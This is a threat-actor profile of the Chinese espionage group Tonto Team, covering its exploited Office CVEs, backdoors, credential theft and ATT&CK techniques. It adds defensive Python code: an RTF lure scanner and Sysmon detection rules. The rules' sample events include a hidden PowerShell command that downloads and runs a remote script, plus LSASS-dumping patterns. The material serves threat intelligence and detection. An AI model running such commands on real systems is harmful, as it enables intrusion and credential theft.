Threat Actor Profile: Tonto Team

Overview 

Tonto Team is a long-running cyber espionage group assessed to operate on behalf of Chinese state interests, with reported links to the Shenyang Military Region Technical Reconnaissance Bureau (Unit 65017). Active since at least 2009, the group has sustained operations across Asia and parts of Eastern Europe, consistently targeting government, defense, and strategic industry sectors. 


Operational activity has been observed in countries including India, Japan, South Korea, Taiwan, Mongolia, Russia, Switzerland, and the United States. The group prioritizes intelligence collection, with targeting aligned to geopolitical and economic interests, particularly in aerospace, defense, energy, mining, and technology sectors. 

Tonto Team maintains a stable malware ecosystem centered on backdoors such as Bisonal and ShadowPad, supported by commodity credential theft utilities and custom loaders. Campaigns rely heavily on spearphishing and exploitation of client-side vulnerabilities to establish initial access. 

Origin, Target Countries and Industries 

Origin of Tonto Team (Source: Cyble Vision) 

Tonto Team is attributed to China and is assessed to operate in alignment with state-sponsored intelligence objectives. Its long-term operational consistency, targeting patterns, and tooling ecosystem indicate affiliation with government-directed cyber espionage efforts within the Asia-Pacific region. 

The group primarily targets countries across Asia, including India, Japan, South Korea, Mongolia, and Taiwan, reflecting strong regional intelligence priorities. Activity has also been observed in China, Russia, and the United States, indicating broader strategic collection requirements tied to geopolitical, military, and economic interests. 

Tonto Team focuses on sectors that provide high-value intelligence and strategic advantage. Key targets include Aerospace & Defense, Government and Law Enforcement agencies, and IT & ITES organizations. The group also targets BFSI (Banking, Financial Services, and Insurance), Manufacturing, and Media & Entertainment sectors, likely to access.

Initial Access and Intrusion Workflow 

Tonto Team commonly initiates compromise through spearphishing emails carrying malicious attachments, typically RTF or Office documents. These files exploit known vulnerabilities in Microsoft Office and its Equation Editor component (EQNEDT32.EXE, a separate process that Office spawns to render embedded equation objects) to gain code execution when the document is opened. 

Observed vulnerabilities include: 

  • CVE-2017-11882: stack buffer overflow in the Equation Editor component (EQNEDT32.EXE) of Microsoft Office, triggered by a malformed embedded equation object  
  • CVE-2018-0802: a second memory-corruption flaw in the same Equation Editor component, disclosed after the patch for CVE-2017-11882  
  • CVE-2018-8174: remote code execution in the Windows VBScript engine, reachable from an Office document that loads attacker-controlled content through a URL moniker  
  • CVE-2019-0803: Win32k elevation-of-privilege vulnerability, used after initial code execution rather than to obtain it (see Credential Access and Privilege Escalation below)  

Execution depends on the target opening the attachment; once the exploit fires, embedded scripts or shellcode retrieve and deploy first-stage payloads. 
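The RTF constructs that Equation Editor lures depend on can be triaged statically before a message reaches a mailbox. The following scanner is an added example written for this profile; it is not Tonto Team tooling and not Cyble code. It decodes the hex payload of an RTF \objdata group, reads the class name from the OLE1 object header, looks for the Equation Editor 3.0 CLSID ({0002CE02-0000-0000-C000-000000000046}), and treats the \objupdate control word (which makes Word activate the object on open without a double-click) as the escalating signal. The two documents at the bottom are constructed for the example; the "native data" is a stand-in for the compound file a real lure would embed.

```python
"""Static triage of an RTF attachment for embedded Equation Editor objects.

Added example, not Tonto Team tooling or Cyble code. It looks for the RTF
constructs that CVE-2017-11882 / CVE-2018-0802 lures rely on:
  * an embedded OLE object of class Equation.3, identified by the \\objclass
    control word, by the class name in the OLE1 stream carried in \\objdata,
    or by the Equation Editor CLSID inside that stream;
  * the \\objupdate control word, which makes Word activate the object on
    open instead of waiting for the user to double-click it.
The sample documents at the bottom are constructed for this example.
"""
import re
import struct

# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} in its
# on-disk form: Data1..Data3 little-endian, Data4 as written.
EQNEDT_CLSID = bytes.fromhex("02CE0200" "0000" "0000" "C000000000000046")

OBJCLASS_RE = re.compile(rb"\\objclass\s+([A-Za-z0-9_.]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
OBJUPDATE_RE = re.compile(rb"\\objupdate\b")


def decode_objdata(hex_blob: bytes) -> bytes:
    """Turn the hex text of an \\objdata group into bytes. Whitespace may be
    interleaved, and obfuscated lures sometimes leave a dangling nibble."""
    digits = re.sub(rb"\s+", b"", hex_blob)
    if len(digits) % 2:
        digits = digits[:-1]
    return bytes.fromhex(digits.decode("ascii"))


def parse_ole1_classname(data: bytes):
    """Read the class name from an OLE1 object stream header:
    version(4) | format(4) | classname length(4) | classname (NUL-terminated)."""
    if len(data) < 12:
        return None
    _version, _fmt, name_len = struct.unpack_from("<III", data, 0)
    if name_len == 0 or name_len > 256 or len(data) < 12 + name_len:
        return None
    return data[12:12 + name_len].rstrip(b"\x00").decode("latin-1", "replace")


def triage_rtf(rtf: bytes) -> dict:
    """Return what was found plus a verdict: clean, suspicious or likely-exploit-lure."""
    result = {"objclass": [], "ole1_class": [], "clsid_hit": False,
              "objupdate": bool(OBJUPDATE_RE.search(rtf)), "verdict": "clean"}
    for m in OBJCLASS_RE.finditer(rtf):
        result["objclass"].append(m.group(1).decode("ascii"))
    for m in OBJDATA_RE.finditer(rtf):
        data = decode_objdata(m.group(1))
        name = parse_ole1_classname(data)
        if name:
            result["ole1_class"].append(name)
        if EQNEDT_CLSID in data:
            result["clsid_hit"] = True
    equation = result["clsid_hit"] or any(
        "equation" in c.lower() for c in result["objclass"] + result["ole1_class"])
    if equation:
        result["verdict"] = "likely-exploit-lure" if result["objupdate"] else "suspicious"
    return result


# --- constructed samples (not real malware) ---------------------------------
def build_ole1_object(class_name: str, native: bytes) -> bytes:
    """Minimal OLE1 embedded-object stream, used only to build the sample."""
    name = class_name.encode("ascii") + b"\x00"
    return (struct.pack("<II", 0x00000501, 2)           # version, format = embedded
            + struct.pack("<I", len(name)) + name        # class name
            + struct.pack("<II", 0, 0)                   # empty topic and item names
            + struct.pack("<I", len(native)) + native)   # native data

# Stand-in for the compound file a real lure would carry: CFB magic, padding,
# and the Equation Editor CLSID where a root storage entry would reference it.
FAKE_NATIVE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8 + EQNEDT_CLSID

SAMPLE_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\pard Procurement summary attached.\par"
    rb"{\object\objemb\objupdate{\*\objclass Equation.3}{\*\objdata "
    + build_ole1_object("Equation.3", FAKE_NATIVE).hex().encode("ascii")
    + rb"}}}"
)
BENIGN_RTF = rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\pard Meeting minutes.\par}"

if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_RTF), ("benign", BENIGN_RTF)):
        print(label, triage_rtf(doc))
```

Real lures obfuscate these groups heavily (control words interleaved in the hex, nested groups, class names that do not say Equation), which is why the CLSID check on the decoded stream matters more than the \objclass text; for production triage, feed attachments to a full RTF parser such as oletools' rtfobj rather than the regular expressions above.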

Post-exploitation activity includes: 

  • PowerShell-based payload retrieval and execution  
  • Deployment of lightweight loaders for second-stage malware  
  • Use of Python-based tooling in select operations  

In some cases, the group has leveraged compromised Microsoft Exchange servers to deploy web shells for persistent access. This approach reflects a consistent reliance on proven exploit chains and user-driven execution rather than zero-day development. 

Malware Architecture and Operational Behavior 

Windows Tooling and Implants 

Tonto Team relies on a mix of custom backdoors and publicly available tools to maintain access and expand control within compromised environments. 

Core malware includes: 

  • Bisonal RAT: Longstanding backdoor used for command execution, file transfer, and surveillance  
  • ShadowPad: Modular backdoor with plugin-based architecture, often deployed via DLL sideloading  

Supporting tooling includes: 

  • Credential dumpers such as Mimikatz, gsecdump, and LaZagne  
  • Keyloggers and custom credential harvesters  
  • Network reconnaissance utilities such as nbtscan  

Execution patterns include DLL search order hijacking and side-loading, where a legitimate signed executable is placed alongside a malicious DLL carrying the name of a library it expects to load, so the malicious code runs inside a trusted, signed process. This blends the activity with legitimate software and defeats controls that trust the signed binary alone. 

Credential Access and Privilege Escalation 

Credential theft is a central component of Tonto Team operations. Mimikatz is used to extract plaintext credentials, password hashes, and Kerberos tickets from LSASS memory, while LaZagne recovers passwords stored by browsers, mail clients, and other applications. 

Observed behaviors include: 

  • Dumping LSASS memory for credential extraction  
  • Harvesting stored application passwords  
  • Capturing keystrokes via keylogging modules  

Privilege escalation is achieved through exploitation of known, already-patched vulnerabilities such as CVE-2019-0803 (Win32k) and MS16-032 (CVE-2016-0099, Secondary Logon service), enabling administrative access prior to lateral movement. 

Lateral Movement and Internal Reconnaissance 

Following initial compromise, Tonto Team performs network discovery and lateral movement using a combination of native tools and exploits. 

Key techniques include: 

  • Enumeration of local users and groups  
  • Network share discovery via nbtscan  
  • Exploitation of SMB vulnerabilities such as EternalBlue (MS17-010, CVE-2017-0144, affecting SMBv1)  

These actions allow the group to expand access across internal systems while identifying high-value assets. 

Command and Control Infrastructure 

Tonto Team maintains persistent communication with compromised hosts through external proxy infrastructure. Traffic is routed through intermediary servers to obscure origin and reduce attribution. 

Command-and-control activity includes: 

  • Downloading additional payloads, including ShadowPad loaders  
  • Remote execution of commands  
  • Data staging prior to exfiltration  

Communication channels primarily rely on standard web protocols, enabling traffic to blend with normal network activity. 

Campaign Activity and Targeting Trends 

Tonto Team has conducted multiple named campaigns reflecting shifts in regional focus. 

  • Operation “Bitter Biscuit”: Targeted Mongolian and Russian entities, indicating expanded geopolitical scope  
  • HeartBeat Campaign (2012): Focused on South Korean government bodies, military organizations, and media outlets  

Across campaigns, targeting remains consistent with intelligence collection objectives, particularly in politically sensitive environments and industries tied to national infrastructure. 

Tooling and Malware Ecosystem 

Malware families and tools used by the Tonto Team (Source: Cyble Vision)

Tonto Team’s tooling strategy combines custom implants with widely available post-exploitation frameworks. 

Frequently observed capabilities include: 

  • Credential extraction and privilege escalation  
  • Remote command execution  
  • File exfiltration and staging  
  • Persistence via web shells and DLL hijacking  

The continued reuse of established malware families alongside incremental tooling additions suggests an emphasis on operational reliability over rapid innovation. 

Conclusion 

Tonto Team continues to operate as a persistent espionage actor with more than a decade of activity. Its consistent use of spearphishing, known vulnerabilities, and modular backdoors enables sustained access to high-value targets across regions.  

Cyble Threat Actor Library (Source: Cyble Vision) 

Cyble assesses that such campaigns highlight the need for continuous, intelligence-led defense strategies powered by real-time visibility and proactive threat hunting. 

Recommendations and Mitigation Strategies 

  • Strengthen defenses against initial access vectors by filtering phishing emails and sandboxing attachments. Prioritize patching of widely exploited vulnerabilities in Microsoft Office and related components. 
  • Restrict execution of scripting environments such as PowerShell and monitor for abnormal script activity. Enforce application control policies to prevent unauthorized DLL loading and sideloading behavior. 
  • Deploy endpoint detection mechanisms capable of identifying credential dumping, LSASS access, and privilege escalation attempts. Monitor for use of tools such as Mimikatz and abnormal authentication patterns. 
  • Segment networks to limit lateral movement and restrict SMB access where it is not needed. Disable SMBv1, which EternalBlue (MS17-010) depends on, confirm the MS17-010 patch is applied, and monitor for exploitation attempts against SMB services. 
  • Audit Exchange servers and external-facing systems for web shells and unauthorized access. Ensure timely patching and log analysis. 
  • Implement multi-factor authentication across administrative accounts and remote access services to reduce the impact of credential compromise. 
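The monitoring points in these recommendations (Office and Equation Editor spawning interpreters, PowerShell download cradles, LSASS access, DLL side-loading, and web-shell child processes under IIS) map directly onto endpoint telemetry. The following rules are an added example for this profile, not Cyble detection content and not anything attributed to the actor; they run over Sysmon-style events (ID 1 process create, ID 7 image load, ID 10 process access) that are constructed inline, and the allowlists and path patterns are starting points to tune, not an authoritative list.

```python
"""Detection logic for the Tonto Team behaviours described in this profile,
run over Sysmon-style events. Added example: neither Cyble's detection
content nor a tool attributed to the actor; the events at the bottom are
constructed. Event IDs follow Sysmon: 1 = process create, 7 = image load,
10 = process access.
"""
import ntpath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
WEB_SERVER_PARENTS = {"w3wp.exe"}   # IIS worker process hosting Exchange / OWA
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
                  "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "-enc ", "-encodedcommand", "frombase64string")
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}  # tune per estate
PROCESS_VM_READ = 0x0010             # the access right a memory dump needs
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")


def _base(path):
    return ntpath.basename(path or "").lower()


def _dir(path):
    return ntpath.dirname(path or "").lower()


def _granted(value):
    """Sysmon logs GrantedAccess as a hex string such as '0x1010'."""
    return int(value, 16) if isinstance(value, str) else int(value or 0)


def detect(events):
    """Return (rule, ATT&CK technique, detail) for every event matching a rule."""
    findings = []
    for ev in events:
        eid = ev.get("event_id")
        if eid == 1:
            image, parent = _base(ev.get("Image")), _base(ev.get("ParentImage"))
            cmd = (ev.get("CommandLine") or "").lower()
            if parent in OFFICE_PARENTS and image in SHELL_CHILDREN:
                findings.append(("office_child_process", "T1203 / T1204.002", f"{parent} -> {image}"))
            if parent in WEB_SERVER_PARENTS and image in SHELL_CHILDREN:
                findings.append(("webshell_child_process", "T1505.003", f"{parent} -> {image}"))
            if image == "powershell.exe" and any(m in cmd for m in CRADLE_MARKERS):
                findings.append(("powershell_download_cradle", "T1059.001 / T1105", cmd[:80]))
        elif eid == 10:
            src, tgt = _base(ev.get("SourceImage")), _base(ev.get("TargetImage"))
            access = _granted(ev.get("GrantedAccess"))
            if tgt == "lsass.exe" and src not in LSASS_ALLOWLIST and access & PROCESS_VM_READ:
                findings.append(("lsass_memory_access", "T1003.001", f"{src} GrantedAccess=0x{access:x}"))
        elif eid == 7:
            image, loaded = ev.get("Image") or "", ev.get("ImageLoaded") or ""
            unsigned = str(ev.get("Signed", "")).lower() != "true"
            # Side-loading heuristic: an unsigned DLL loaded from the same
            # user-writable directory as the executable that loaded it.
            if (unsigned and _dir(image) == _dir(loaded)
                    and any(p in loaded.lower() for p in USER_WRITABLE)):
                findings.append(("dll_sideload_candidate", "T1574.001", f"{_base(image)} loaded {loaded}"))
    return findings


SAMPLE_EVENTS = [   # constructed; 203.0.113.0/24 is documentation address space
    {"event_id": 1, "ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c start /b powershell -w hidden -enc SQBFAFgA"},
    {"event_id": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"},
    {"event_id": 10, "SourceImage": r"C:\Users\Public\m.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"event_id": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"event_id": 7, "Image": r"C:\ProgramData\Update\sysupd.exe",
     "ImageLoaded": r"C:\ProgramData\Update\log.dll", "Signed": "false"},
    {"event_id": 7, "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\shell32.dll", "Signed": "true"},
    {"event_id": 1, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c whoami"},
    {"event_id": 1, "ParentImage": r"C:\Windows\System32\userinit.exe",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for rule, technique, detail in detect(SAMPLE_EVENTS):
        print(f"[{technique}] {rule}: {detail}")
```

The LSASS rule keys on PROCESS_VM_READ in GrantedAccess rather than on exact masks such as 0x1010 or 0x1fffff, because the read right is what every dumper needs; expect noise from AV and EDR agents until the allowlist reflects the estate. The side-loading rule is deliberately narrow (unsigned DLL beside its host executable in a user-writable path); it will not catch a malicious DLL planted next to a signed binary under Program Files, which needs a file-integrity or signature-mismatch check instead.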

MITRE ATT&CK Techniques Associated with Tonto Team 

MITRE ATT&CK Techniques (Source: Cyble Vision)

  • Spearphishing Attachment (T1566.001): Delivery of malicious Office and RTF documents. 
  • PowerShell (T1059.001): Retrieval and execution of payloads. 
  • Python (T1059.006): Use of Python-based tooling. 
  • Exploitation for Client Execution (T1203): Abuse of Office vulnerabilities. 
  • User Execution (T1204.002): Reliance on user interaction. 
  • Web Shell (T1505.003): Deployment on compromised servers. 
  • DLL Search Order Hijacking (T1574.001): Execution via trusted binaries. 
  • Exploitation for Privilege Escalation (T1068): Use of known vulnerabilities. 
  • OS Credential Dumping (T1003): Extraction of credentials. 
  • Keylogging (T1056.001): Capture of user input. 
  • Local Groups (T1069.001): Enumeration of user roles. 
  • Network Share Discovery (T1135): Identification of shared resources. 
  • Exploitation of Remote Services (T1210): Use of SMB exploits. 
  • External Proxy (T1090.002): Traffic obfuscation via proxy infrastructure. 
  • Ingress Tool Transfer (T1105): Delivery of additional payloads. 
